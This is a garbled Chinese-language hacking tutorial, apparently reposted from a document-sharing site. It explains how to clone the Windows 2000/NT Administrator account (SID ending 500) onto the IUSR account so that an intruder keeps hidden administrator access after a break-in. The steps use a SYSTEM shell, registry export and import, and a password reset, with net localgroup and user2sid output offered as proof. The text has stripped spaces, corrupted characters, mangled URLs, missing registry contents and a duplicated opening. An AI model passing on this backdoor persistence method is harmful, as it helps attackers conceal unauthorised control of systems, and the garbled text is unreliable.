克隆管理员帐号的方法大全
克隆管理员帐号的方法大全
经常看到一些人在入侵一台Windows2000或者WindowsNT后堂而皇之地创立一个管理员组的用户,似乎当管理员不存在一般,今天偶违背一下偶以前的初衷,Share一个类似于Root克隆管理员帐号的方法大全
克隆管理员帐号的方法大全
经常看到一些人在入侵一台Windows2000或者WindowsNT后堂而皇之地创立一个管理员组的用户,似乎当管理员不存在一般,今天偶违背一下偶以前的初衷,Share一个类似于RootKit的玩艺,当然,这些过程也是可以用脚本实现的,但是我就不写了,OKShowTimeNow
首先要让大家知道的概念是在Windows2000和WindowsNT里,默认管理员帐号的SID是固定的500(0x1f4),那么我们可以用机器里已经存在的一个帐号将SID为500的帐号进行克隆,在这里我们选择的帐号是IUSRMachineName©然,为了加强隐蔽性,我们选择了这个帐号,所有用户都可以用以下的方法,只不过这个用户较常见罢了),测试环境为Windows2000Server。
运行一个System的CMDShell(.sometips./tips/scripts/://.sometips./soft/),然后在该CMDShell里面运行
regedit/
regedit/
导入该Reg文件
然后运行
userIUSRMachineNameSometips
修改IUSRMachineName勺密码(最好使用14位的密码,越像IUSRMachineNam的密码越好)
OK,大功告成...
这样,我们拥有和默认管理员一样的桌面、一样的Profile.....
而且,,看看结果:
C:>localgroupadministrators
Aliasnameadministrators
CommentAdministratorshavepleteandunrestrictedaesstotheputer/domain
Members
Administrator
Themandpletedsuessfully.
再看看USER2SID勺输出结果:
C:>user2sidAdministrator
S-1-5-21-1004336348-1078145449-854245398-500
Numberofsubauthoritiesis5
DomainisIDONTKNOW
LengthofSIDinmemoryis28bytes
TypeofSIDisSidTypeUser
C:>user2sidiusrmachinename
S-1-5-21-1004336348-1078145449-854245398-1001
Numberofsubauthoritiesis5
DomainisIDONTKNOW
LengthofSIDinmemoryis28bytes
TypeofSIDisSidTypeUser
我想,
克隆管理员帐号的方法大全 来自淘豆网m.daumloan.com转载请标明出处.